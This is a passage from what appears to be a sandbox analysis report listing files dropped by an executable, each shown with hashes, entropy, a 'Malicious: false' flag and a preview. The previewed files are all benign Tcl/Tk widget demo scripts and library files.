SHA-512:	816319A3FE2060F06B6E48389D6C6797DE4BE14905DFC0CF5BF6D08AED8F176380859624E59F8ED1E1F87EA2DE3EFE1D9F68512079698C6DAA2B52467AD03F16
Malicious:	false
Preview:	# text.tcl --.#.# This demonstration script creates a text widget that describes.# the basic editing functions...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .text.catch {destroy $w}.toplevel $w.wm title $w "Text Demonstration - Basic Facilities".wm iconname $w "text".positionWindow $w..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..text $w.text -yscrollcommand [list $w.scroll set] -setgrid 1 \..-height 30 -undo 1 -autosep 1.scrollbar $w.scroll -command [list $w.text yview].pack $w.scroll -side right -fill y.pack $w.text -expand yes -fill both.$w.text insert 0.0 \.{This window is a text widget. It displays one or more lines of text.and allows you to edit the text. Here is a summary of the things you.can do to a text widget:..1. Scrolling. Use the scrollbar to adjust the view in the text window...2. Scanning. Press mouse button 2 in the text window an

C:\Users\user\Desktop\tk\demos\textpeer.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2183
Entropy (8bit):	4.663027037802248
Encrypted:	false
SSDEEP:	48:h2gXe188M1XCmRJAqaM7Xy1pUt4N+mTRU49CbAVTWzpB/eZtRNJ2Cn:hBOOjCo7XyTz9CbiWz7eBNJ3
MD5:	7BB002EF75279A1128113209E94ECFFD
SHA1:	C689563EDF683EE869530709E275D4C6D8A4F395
SHA-256:	AAA48E7A73017328DAD9275E45095A8CE6110C5E0E15CA00427CEFC8F3A0C4E9
SHA-512:	D271AC156F6EE183A3B88EFAFEC9FA33E8B479D894178C86206045B449F09B4FB4A8CD8B6B9026DB9AEFFD81383960F9F193E7F9DE723B49FDF2D08973C46D48
Malicious:	false
Preview:	# textpeer.tcl --.#.# This demonstration script creates a pair of text widgets that can edit a.# single logical buffer. This is particularly useful when editing related text.# in two (or more) parts of the same file...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .textpeer.catch {destroy $w}.toplevel $w.wm title $w "Text Widget Peering Demonstration".wm iconname $w "textpeer".positionWindow $w..set count 0..## Define a widget that we peer from; it won't ever actually be shown though.set first [text $w.text[incr count]].$first insert end "This is a coupled pair of text widgets; they are peers to ".$first insert end "each other. They have the same underlying data model, but ".$first insert end "can show different locations, have different current edit ".$first insert end "locations, and have different selections. You can also ".$first insert end "create additional peers of any of these text widgets using ".$f

C:\Users\user\Desktop\tk\demos\timer Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1116
Entropy (8bit):	4.76328126220076
Encrypted:	false
SSDEEP:	24:MlFIU5DmsXG20yPa4WQysdp4FNevsN/T/OXUETkLuaS0:MlHDmk0yCky4CUsF4HJn0
MD5:	9B8EAEAB63D190C472CA4B8C6F72184C
SHA1:	9C1D2DAE724267E705024DA87CD4FA347816293B
SHA-256:	39E6297F00F7CEB1886355880C4F88D938E993E4B83906AFA21EAF6E1CCE3F4E
SHA-512:	1D87666A3A54D33914EFD0415F45BE6C95A9C9ACC4447062289D043FFB5CFE0CB4E1E045BEBB758BDC48BC18E01284E27C2515851F91E7216581D5C8FC19BEAF
Malicious:	false
Preview:	#!/bin/sh.# the next line restarts using wish \.exec wish "$0" ${1+"$@"}..# timer --.# This script generates a counter with start and stop buttons...package require Tcl 8.4.package require Tk..label .counter -text 0.00 -relief raised -width 10 -padx 2m -pady 1m.button .start -text Start -command {. if {$stopped} {..set stopped 0..set startMoment [clock clicks -milliseconds]..tick...stop configure -state normal...start configure -state disabled. }.}.button .stop -text Stop -state disabled -command {. set stopped 1. .stop configure -state disabled. .start configure -state normal.}.pack .counter -side bottom -fill both.pack .start -side left -fill both -expand yes.pack .stop -side right -fill both -expand yes..set startMoment {}..set stopped 1..proc tick {} {. global startMoment stopped. if {$stopped} {return}. after 50 tick. set elapsedMS [expr {[clock clicks -milliseconds] - $startMoment}]. .counter config -text [format "%.2f" [expr {double($elapsedMS)/1000

C:\Users\user\Desktop\tk\demos\toolbar.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	4.830929239143503
Encrypted:	false
SSDEEP:	96:MOZjatQYGGe58eJg/8/SqAqiO4VBk4fWMT8EHi:MOZutQYce+jAqBK64fMr
MD5:	322B686545BF6954F917582357767960
SHA1:	5D42A50BF3E8D77C46AF7D419A99FE1DC901CB3B
SHA-256:	B8565B87B7743041BC09B5ECBCD14F7A300721638FE6C1DB6E69C0B1C967D5E1
SHA-512:	9F9E4E1D4255EF1ABC92CD25E6596591660130AF3AFA07563D40D3E89C40654ECF3AA5748D9B7271CA0E5230D456533AA85D02A02A4E4B7BB6DC052427DB33D8
Malicious:	false
Preview:	# toolbar.tcl --.#.# This demonstration script creates a toolbar that can be torn off...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .toolbar.destroy $w.toplevel $w.wm title $w "Toolbar Demonstration".wm iconname $w "toolbar".positionWindow $w..ttk::label $w.msg -wraplength 4i -text "This is a demonstration of how to do\..a toolbar that is styled correctly and which can be torn off. The\..buttons are configured to be \u201Ctoolbar style\u201D buttons by\..telling them that they are to use the Toolbutton style. At the left\..end of the toolbar is a simple marker that the cursor changes to a\..movement icon over; drag that away from the toolbar to tear off the\..whole toolbar into a separate toplevel widget. When the dragged-off\..toolbar is no longer needed, just close it like any normal toplevel\..and it will reattach to the window it was torn off from."..## Set up the toolbar hull.set t [frame $w.toolbar]

C:\Users\user\Desktop\tk\demos\tree.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3367
Entropy (8bit):	4.845998666511683
Encrypted:	false
SSDEEP:	96:oOVLsKyW6MGuwcf9P8CkZE2eIvJf875nn//qqKGCQq:oO1OFq8py7IvJfq//qNVN
MD5:	E7DE5D4902EFB28EE372F7891D1D2866
SHA1:	6C57C07191305CADBE6AFD46503D0BEF19FC63C7
SHA-256:	7B6B02DD17B9BEE87E32AC7E5C7F2C986F4A9BD7DD980EAB23F8E50686EF676B
SHA-512:	FE4CA86CD64733F0C8A7A6CCEC8D2AD926E59366015E673F0FF932A4D119A9B791FB17BC56287FF3C23F85B481233888A9CC0BD7304965E3D3DBE1BCAC092EF3
Malicious:	false
Preview:	# tree.tcl --.#.# This demonstration script creates a toplevel window containing a Ttk.# tree widget...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk.package require Ttk..set w .tree.catch {destroy $w}.toplevel $w.wm title $w "Directory Browser".wm iconname $w "tree".positionWindow $w..## Explanatory text.ttk::label $w.msg -font $font -wraplength 4i -justify left -anchor n -padding {10 2 10 6} -text "Ttk is the new Tk themed widget set. One of the widgets it includes is a tree widget, which allows the user to browse a hierarchical data-set such as a filesystem. The tree widget not only allows for the tree part itself, but it also supports an arbitrary number of additional columns which can show additional data (in this case, the size of the files found in your filesystem). You can also change the width of the columns by dragging the boundary between them.".pack $w.msg -fill x..## See Code / Dismiss.pack [addSeeDism

C:\Users\user\Desktop\tk\demos\ttkbut.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3425
Entropy (8bit):	4.82423506386336
Encrypted:	false
SSDEEP:	96:rmTOVXeazTTY8JCBDXbuTfFoOTPPeX/oMoinBU8:rmTOVeqw8JCFXbifFTPeXJnnF
MD5:	0902D3C6AB09AFC8658F3DE28B6152DC
SHA1:	7CFB8AC34BBCA5D81BF3BC39E5ABD17E6838B753
SHA-256:	34D80027E458313AEB23882BEE40C90A73C3A697BBF0108F9922CA230C535152
SHA-512:	F8088A127D2D6FB17DBF74ED1352B1D4ACEF0A9D4FA6BB01FFA6DE0F5CFE4096FA712A5C8D7FF154192E66963ECC9730F448692E7C9F0EADBA7DB202FDBBE53D
Malicious:	false
Preview:	# ttkbut.tcl --.#.# This demonstration script creates a toplevel window containing several.# simple Ttk widgets, such as labels, labelframes, buttons, checkbuttons and.# radiobuttons...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk.package require Ttk..set w .ttkbut.catch {destroy $w}.toplevel $w.wm title $w "Simple Ttk Widgets".wm iconname $w "ttkbut".positionWindow $w..ttk::label $w.msg -font $font -wraplength 4i -justify left -text "Ttk is the new Tk themed widget set. This is a Ttk themed label, and below are three groups of Ttk widgets in Ttk labelframes. The first group are all buttons that set the current application theme when pressed. The second group contains three sets of checkbuttons, with a separator widget between the sets. Note that the \u201cEnabled\u201d button controls whether all the other themed widgets in this toplevel are in the disabled state. The third group has a collection of linked radiob

C:\Users\user\Desktop\tk\demos\ttkmenu.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2411
Entropy (8bit):	4.719882275466244
Encrypted:	false
SSDEEP:	48:9ZKH2XeGWkX88Y6OwUKYfDB7+qxYyWFLm5epFMRl3a:NOVksR9LBgFYlK
MD5:	F729D92A3D697FD5F9D655AE5CE7E19A
SHA1:	1AF8FF01A23EB0C7BC614F3FFAF8F689DB639DDE
SHA-256:	C00F49D8A899639674E7ACE617D580C212C6D747BFFF2AA8086DB359FDBB52CC
SHA-512:	8F21D46BD4A1D9043A28EC3A2E0070DC46880202D8B29977F5FD5D48F8FF9A823591BA3F1C21815158EF4295128679075862E5776F67C2C2AB7763EDEEB3C6EA
Malicious:	false
Preview:	# ttkmenu.tcl --.#.# This demonstration script creates a toplevel window containing several Ttk.# menubutton widgets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk.package require Ttk..set w .ttkmenu.catch {destroy $w}.toplevel $w.wm title $w "Ttk Menu Buttons".wm iconname $w "ttkmenu".positionWindow $w..ttk::label $w.msg -font $font -wraplength 4i -justify left -text "Ttk is the new Tk themed widget set, and one widget that is available in themed form is the menubutton. Below are some themed menu buttons that allow you to pick the current theme in use. Notice how picking a theme changes the way that the menu buttons themselves look, and that the central menu button is styled differently (in a way that is normally suitable for toolbars). However, there are no themed menus; the standard Tk menus were judged to have a sufficiently good look-and-feel on all platforms, especially as they are implemented as native con

C:\Users\user\Desktop\tk\demos\ttknote.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2472
Entropy (8bit):	4.765592637329269
Encrypted:	false
SSDEEP:	48:iZTXeGW3b88Y1y7UhCLKoKbDMLWhKiz/A1Lhw8E8yZEcUPh9x7hFDrZg6yTuIGyY:GOV3AR04hRxDrhzaW5qh3hFDrZg6yTuX
MD5:	29B0DDDAF20683A9CC47C1B0285C41CA
SHA1:	B60E0A9425CFFE4A14FD867AAEC9CE49436EAA78
SHA-256:	00D1E122755A588C40CA96FA1A75D4C343917DF30E75B07888429664198967C7
SHA-512:	D549FE17609ED50A8EC6F53B796E5737CABEFF516B6A15CC5E5C85FC376771B61F8F2D5151D883CFB4ADAAAD344AE17727F90463C7122168E8909889F1675EA4
Malicious:	false
Preview:	# ttknote.tcl --.#.# This demonstration script creates a toplevel window containing a Ttk.# notebook widget...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk.package require Ttk..set w .ttknote.catch {destroy $w}.toplevel $w.wm title $w "Ttk Notebook Widget".wm iconname $w "ttknote".positionWindow $w..## See Code / Dismiss.pack [addSeeDismiss $w.seeDismiss $w] -side bottom -fill x..ttk::frame $w.f.pack $w.f -fill both -expand 1.set w $w.f..## Make the notebook and set up Ctrl+Tab traversal.ttk::notebook $w.note.pack $w.note -fill both -expand 1 -padx 2 -pady 3.ttk::notebook::enableTraversal $w.note..## Popuplate the first pane.ttk::frame $w.note.msg.ttk::label $w.note.msg.m -font $font -wraplength 4i -justify left -anchor n -text "Ttk is the new Tk themed widget set. One of the widgets it includes is the notebook widget, which provides a set of tabs that allow the selection of a group of panels, each with distinct c

C:\Users\user\Desktop\tk\demos\ttkpane.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4047
Entropy (8bit):	4.852313254792623
Encrypted:	false
SSDEEP:	96:LOV6Td5Y4hf31pY0vr0vHTUR/K+k75X/o9S5PJLMvujp+ZpKor:LO455b/Ij75P/LhK/
MD5:	B9F14E86BB517A76AC493240499F100D
SHA1:	F6F2141B37F7854CFF93699042865B40EF3B9B7C
SHA-256:	B5512A96C07A48DB1F23E9DC050CAF647C7BE998B082E988C9ADD3080E3D9EB2
SHA-512:	997926086CDD7112FB58DD6AC774DEFB2ACCE29E75418F7CD0BC46916AB63E5E9828E16D16068AC2EE5673F648342B2FB13A01EB8C83177995181CDBE81B4EA1
Malicious:	false
Preview:	# ttkpane.tcl --.#.# This demonstration script creates a Ttk pane with some content...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk.package require Ttk..set w .ttkpane.catch {destroy $w}.toplevel $w.wm title $w "Themed Nested Panes".wm iconname $w "ttkpane".positionWindow $w..ttk::label $w.msg -font $font -wraplength 4i -justify left -text "This demonstration shows off a nested set of themed paned windows. Their sizes can be changed by grabbing the area between each contained pane and dragging the divider.".pack $w.msg [ttk::separator $w.msgSep] -side top -fill x..## See Code / Dismiss.pack [addSeeDismiss $w.seeDismiss $w] -side bottom -fill x..ttk::frame $w.f.pack $w.f -fill both -expand 1.set w $w.f.ttk::panedwindow $w.outer -orient horizontal.$w.outer add [ttk::panedwindow $w.outer.inLeft -orient vertical].$w.outer add [ttk::panedwindow $w.outer.inRight -orient vertical].$w.outer.inLeft add [ttk::labelframe $w

C:\Users\user\Desktop\tk\demos\ttkprogress.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1556
Entropy (8bit):	4.796484647346652
Encrypted:	false
SSDEEP:	48:5HW/XeGW6pf8Q9Ipbf16rzMXrzf9AisxhCEGO2Hc12IGrrx:WOV6iQH4dsxhBgc12zr1
MD5:	34EBDD1D00AC1ADB411E0DB44B3840FF
SHA1:	87A9162016193B7C2B9926874D55D5F67B5A0D45
SHA-256:	26573D677EE1722DAF1A579E61E485F66E4FF0BCA2D2D6EAD4BDD57F8EB2E9DA
SHA-512:	1F3D61252F15F833783A56814927CCBE1F358E692E44A18497DF14753CD1546FB4E59C2F7808855A77E7E9F6219CAB19F18D02E48993F9F3A026D8BE1D6CBD6A
Malicious:	false
Preview:	# ttkprogress.tcl --.#.# This demonstration script creates several progress bar widgets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk.package require Ttk..set w .ttkprogress.catch {destroy $w}.toplevel $w.wm title $w "Progress Bar Demonstration".wm iconname $w "ttkprogress".positionWindow $w..ttk::label $w.msg -font $font -wraplength 4i -justify left -text "Below are two progress bars. The top one is a \u201Cdeterminate\u201D progress bar, which is used for showing how far through a defined task the program has got. The bottom one is an \u201Cindeterminate\u201D progress bar, which is used to show that the program is busy but does not know how long for. Both are run here in self-animated mode, which can be turned on and off using the buttons underneath.".pack $w.msg -side top -fill x..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..ttk::frame $w.f.pack $w.f -

C:\Users\user\Desktop\tk\demos\ttkscale.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1420
Entropy (8bit):	4.80558121115394
Encrypted:	false
SSDEEP:	24:KEXXeVXewn1H0HVkXXcNIhaFIWd3GYk1pvcZMhpaymxRWTWwXQk4s:vXeLnAVkc35dGYknvhpafbWTWwXOs
MD5:	598DE4DACEDFC706B879F621E5B218B1
SHA1:	00AFEDAE296CD849F8B9C49D6F46CBC2B263E048
SHA-256:	E86D081331FEBFE401A13A44C68BA82B582B2E66B6E9366DD58025DDAC9A1A26
SHA-512:	9CECEF70416A619E6651BCB295288EDC31AA6876BF014CF701D6F39BC1EEE276366B673FD5D1B267B2DA2E49EC68FA15F6CC3C203CDB25BEC1EB1C9F416FC865
Malicious:	false
Preview:	# ttkscale.tcl --.#.# This demonstration script shows an example with a horizontal scale...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .ttkscale.catch {destroy $w}.toplevel $w -bg [ttk::style lookup TLabel -background].wm title $w "Themed Scale Demonstration".wm iconname $w "ttkscale".positionWindow $w..pack [ttk::frame [set w $w.contents]] -fill both -expand 1..ttk::label $w.msg -font $font -wraplength 3.5i -justify left -text "A label tied to a horizontal scale is displayed below. If you click or drag mouse button 1 in the scale, you can change the contents of the label; a callback command is used to couple the slider to both the text and the coloring of the label.".pack $w.msg -side top -padx .5c..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons [winfo toplevel $w]].pack $btns -side bottom -fill x..ttk::frame $w.frame -borderwidth 10.pack $w.frame -side top -fill x..# List of colors fr

C:\Users\user\Desktop\tk\demos\twind.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10827
Entropy (8bit):	4.820837713757379
Encrypted:	false
SSDEEP:	192:pOpY8WToifHUeFVCT397+YZDrG5QCIVmP0b7fWkdP7loph3AeOpxpwha4:piYbL/BFVW0YZDrGGCIVHP7lwJOqE4
MD5:	C398EA7FA74EAF934956481242BC4675
SHA1:	B23E3F8EADA079A0795A156AFE45C35B33867B48
SHA-256:	0E999627500A462A433F0730A7B512C27D043FF0CA8C0C329DA24A6250DCBE7E
SHA-512:	A206B089ECF7735A6BB3E471E40D2A3990BFCA63605EED600FA02EE8B2D91A832E7021BD4CADDF24D3CB26E9861A5ED1DA927435028F7456E6FA6B5AA8CD7141
Malicious:	false
Preview:	# twind.tcl --.#.# This demonstration script creates a text widget with a bunch of.# embedded windows...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .twind.catch {destroy $w}.toplevel $w.wm title $w "Text Demonstration - Embedded Windows and Other Features".wm iconname $w "Embedded Windows".positionWindow $w..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..frame $w.f -highlightthickness 1 -borderwidth 1 -relief sunken.set t $w.f.text.text $t -yscrollcommand "$w.scroll set" -setgrid true -font $font -width 70 \..-height 35 -wrap word -highlightthickness 0 -borderwidth 0.pack $t -expand yes -fill both.scrollbar $w.scroll -command "$t yview".pack $w.scroll -side right -fill y.panedwindow $w.pane.pack $w.pane -expand yes -fill both.$w.pane add $w.f.# Import to raise given creation order above.raise $w.f..$t tag configure center -justify center -spacing1 5m

C:\Users\user\Desktop\tk\demos\unicodeout.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3536
Entropy (8bit):	5.302675366709767
Encrypted:	false
SSDEEP:	96:FsGO4DEfG15Fb/jAm2TDgoklV4tnINw4hHZwkfELfUv:tOaEfM5FbN2XgoWOeNHhHZoUv
MD5:	C0F4E507D0225420902D03AA3A03A873
SHA1:	E9D140528D85682EE407417F27E34A2F4E49E49E
SHA-256:	BEFEFDA40004F4B66489098EAE7169677CEADB53E95F7BCF8E6C3AF7CA77C2BD
SHA-512:	9431BAE46380E83B88B2AB2BE478468AAC85519C17C79DA650710F7AF2D0A4C86DD1046AD663A755E552E9C625660BDAB19F7467774FBDD8B7C89C339A6EF2A2
Malicious:	false
Preview:	# unicodeout.tcl --.#.# This demonstration script shows how you can produce output (in label.# widgets) using many different alphabets...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..# On Windows, we need to determine whether the font system will render.# right-to-left text...if {[tk windowingsystem] eq {win32}} {. set rkey [join {..HKEY_LOCAL_MACHINE..SOFTWARE..Microsoft..{Windows NT}..CurrentVersion..LanguagePack. } \\]. set w32langs {}. if {![catch {package require registry}]} {..if {[catch {registry values $rkey} w32langs]} {.. set w32langs {}..}. }.}..set w .unicodeout.catch {destroy $w}.toplevel $w.wm title $w "Unicode Label Demonstration".wm iconname $w "unicodeout".positionWindow $w..label $w.msg -font $font -wraplength 4i -anchor w -justify left \..-text "This is a sample of Tk's support for languages that use\..non-Western character sets. However, what you will actually see\..below de

C:\Users\user\Desktop\tk\demos\vscale.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1477
Entropy (8bit):	4.842708746044275
Encrypted:	false
SSDEEP:	24:pE1XeVXeL1KwhaFGKg1p8p1Q2RPoSBo+tqap19s9jxE6zT/iqyRFGH:mXem8ZExUpO2RPNe+tqaFkjxFzT/iq2M
MD5:	84FCF0091A550B08641EB9B4548C8A7B
SHA1:	B7198D6620B835790787C3C17A785E9DD6C0F841
SHA-256:	550A3D317E78263A0933F5DBDBA2E82AF4E930DC502DC4DF33C684F66FC84A02
SHA-512:	F8370D3FF31A1D48E9919188D1871D77F020DECED7679D310D8A029B58DEE6F6D4E9AB7F816E93EAE8F94D9FA8FBDFD8DFB60FEB774D6A4E7654070C5BB141A7
Malicious:	false
Preview:	# vscale.tcl --.#.# This demonstration script shows an example with a vertical scale...if {![info exists widgetDemo]} {. error "This script should be run from the \"widget\" demo.".}..package require Tk..set w .vscale.catch {destroy $w}.toplevel $w.wm title $w "Vertical Scale Demonstration".wm iconname $w "vscale".positionWindow $w..label $w.msg -font $font -wraplength 3.5i -justify left -text "An arrow and a vertical scale are displayed below. If you click or drag mouse button 1 in the scale, you can change the size of the arrow.".pack $w.msg -side top -padx .5c..## See Code / Dismiss buttons.set btns [addSeeDismiss $w.buttons $w].pack $btns -side bottom -fill x..frame $w.frame -borderwidth 10.pack $w.frame..scale $w.frame.scale -orient vertical -length 284 -from 0 -to 250 \..-command "setHeight $w.frame.canvas" -tickinterval 50.canvas $w.frame.canvas -width 50 -height 50 -bd 0 -highlightthickness 0.$w.frame.canvas create polygon 0 0 1 1 2 2 -fill SeaGreen3 -tags poly.$w.frame.can

C:\Users\user\Desktop\tk\demos\widget Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	23373
Entropy (8bit):	5.033680002793014
Encrypted:	false
SSDEEP:	384:K0VYA9qnKcluyb2ROTrF4N7eqezHycEzoQ2aUOwk8J7nBGU+4GdISVl3XOBXZhDl:3VYA9qnKv22R6E7eLHIM1aUM81ngUAdW
MD5:	2769B4A523D53BF9FAFB6A21BFCE494A
SHA1:	2815A16AA680C52BDFBE322981D3705A2B4E93D8
SHA-256:	0537EA2E5F7914944DAED092779E297F2304B30059CFBF2642AFA5CA2463D866
SHA-512:	381E9C48540A441A4F4A70D564A5BEB4F30A2072E9322CFF963D53DE3BC57B4967C72F8C7193128C9942C11B68C0F7B12ED4364F4AA2595D9A1F7C5EECFC9074
Malicious:	false
Preview:	#!/bin/sh.# the next line restarts using wish \.exec wish "$0" ${1+"$@"}..# widget --.# This script demonstrates the various widgets provided by Tk, along with many.# of the features of the Tk toolkit. This file only contains code to generate.# the main window for the application, which invokes individual.# demonstrations. The code for the actual demonstrations is contained in.# separate ".tcl" files is this directory, which are sourced by this script as.# needed...package require Tcl.8.5.package require Tk.8.5.package require msgcat.package require Ttk..eval destroy [winfo child .].set tk_demoDirectory [file join [pwd] [file dirname [info script]]].::msgcat::mcload $tk_demoDirectory.namespace import ::msgcat::mc.wm title . [mc "Widget Demonstration"].if {[tk windowingsystem] eq "x11"} {. # This won't work everywhere, but there's no other way in core Tk at the. # moment to display a coloured icon.. image create photo TclPowered \.. -file [file join $tk_library images logo64

C:\Users\user\Desktop\tk\dialog.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6006
Entropy (8bit):	4.773863015400918
Encrypted:	false
SSDEEP:	96:WfPaDCAV8OgciKHKKcmQH+DmlYm4Kalo9mBy//IWxIb:WfPwCAVviKHKK4H+DmT4Kalo4ynDOb
MD5:	02E1EA6A212E59B5B2C0B19527997D25
SHA1:	1FEE1494D003542D114A5C7AE01A3DDEBDF3D871
SHA-256:	8B15235D85AC90ED02EC86C48EA674C94FBB1A84E126867A5A6945A1F694743F
SHA-512:	3589303BFB0C3306473770F54425111BE22EC0E66F618E7598A6082810469A3ADA44F6D44CA3A7E1760EC67277349AF6EF98A7D2949E839D910519F225DFF41B
Malicious:	false
Preview:	# dialog.tcl --.#.# This file defines the procedure tk_dialog, which creates a dialog.# box containing a bitmap, a message, and one or more buttons..#.# Copyright (c) 1992-1993 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#.# ::tk_dialog:.#.# This procedure displays a dialog box, waits for a button in the dialog.# to be invoked, then returns the index of the selected button. If the.# dialog somehow gets destroyed, -1 is returned..#.# Arguments:.# w -..Window to use for dialog top-level..# title -.Title to display in dialog's decorative frame..# text -.Message to display in dialog..# bitmap -.Bitmap to display in dialog (empty string means none)..# default -.Index of button that is to display the default ring.#..(-1 means none)..# args -.One or more strings to display in buttons across the.#..bottom of t

C:\Users\user\Desktop\tk\entry.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16950
Entropy (8bit):	4.926506008059835
Encrypted:	false
SSDEEP:	384:PleFkH2gRhOMQod3tCAERebMIDlXVQgXwVviw:P8FDeUy8V
MD5:	BB972B7001DF64FF5BB6E409ED41F8DB
SHA1:	3ED09139021820E4352BF8017AE1C77E5C4AE111
SHA-256:	0E993885F365AEEB4C9B1D3C40725B97BDCBB4217051643CC499B63941EEB8E3
SHA-512:	8D23A3B27E1E6F9F135F62C5F928D6127069087BDE0800356F2ED999814A68B2FB42377AF41BAC1E60AFD991AA0EC7AB958A00D47E0129286489DFFE6A292490
Malicious:	false
Preview:	# entry.tcl --.#.# This file defines the default bindings for Tk entry widgets and provides.# procedures that help in implementing those bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for example,.#...start dragging out a selection)..# pressX -..X-coordinate at which the mouse button was pressed..# selectMode -..The style of selection currently underway:.#...char, word, or line..# x, y -..La

C:\Users\user\Desktop\tk\focus.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4857
Entropy (8bit):	4.7675047842795895
Encrypted:	false
SSDEEP:	96:mumhRUI7F2WyHm6BUyNhEf6jUHKRUI7F2WyQe6L763AcnK0/61sk2ko5AgEplauw:ERUQFU52CNRUQFpLOQIG1sk2TCLplauw
MD5:	7EA007F00BF194722FF144BE274C2176
SHA1:	6835A515E85A9E55D5A27073DAE1F1A5D7424513
SHA-256:	40D4E101A64B75361F763479B01207AE71535337E79CE6E162265842F6471EED
SHA-512:	E2520EB065296C431C71DBBD5503709CF61F93E74FE324F4F8F3FE13131D62435B1E124D38E2EC84939B92198A54B8A71DFC0A8D32F0DD94139C54068FBCAAF2
Malicious:	false
Preview:	# focus.tcl --.#.# This file defines several procedures for managing the input.# focus..#.# Copyright (c) 1994-1995 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_focusNext --.# This procedure returns the name of the next window after "w" in.# "focus order" (the window that should receive the focus next if.# Tab is typed in w). "Next" is defined by a pre-order search.# of a top-level and its non-top-level descendants, with the stacking.# order determining the order of siblings. The "-takefocus" options.# on windows determine whether or not they should be skipped..#.# Arguments:.# w -..Name of a window...proc ::tk_focusNext w {. set cur $w. while {1} {...# Descend to just before the first child of the current widget....set parent $cur..set children [winfo children $cur]..set i -1...# Look for the next sibling that isn't a top-level....while {1} {.. incr i..

C:\Users\user\Desktop\tk\images\README Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	322
Entropy (8bit):	4.341180398587801
Encrypted:	false
SSDEEP:	6:nVhmHdeA1xNZgkrIf3Ju4dFi6VbGWrWhr3W7FxmVFraGVAJFKyVQR7icrtpwB:nPqf1fZgZA4FJbB6dm7FUjAJVVMM
MD5:	FC8A86E10C264D42D28E23D9C75E7EE5
SHA1:	F1BA322448D206623F8FE734192F383D8F7FA198
SHA-256:	2695ADFF8E900C31B4D86414D22B8A49D6DD865CA3DD99678FA355CDC46093A8
SHA-512:	29C2DF0D516B5FC8E52CB61CFCD07AF9C90B40436DFE64CEFDB2813C0827CE65BA50E0828141256E2876D4DC251E934A6854A8E0B02CDAF466D0389BD778AEF0
Malicious:	false
Preview:	README - images directory..This directory includes images for the Tcl Logo and the Tcl Powered.Logo. Please feel free to use the Tcl Powered Logo on any of your.products that employ the use of Tcl or Tk. The Tcl logo may also be.used to promote Tcl in your product documentation, web site or other.places you so desire..

C:\Users\user\Desktop\tk\images\logo.eps Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	32900
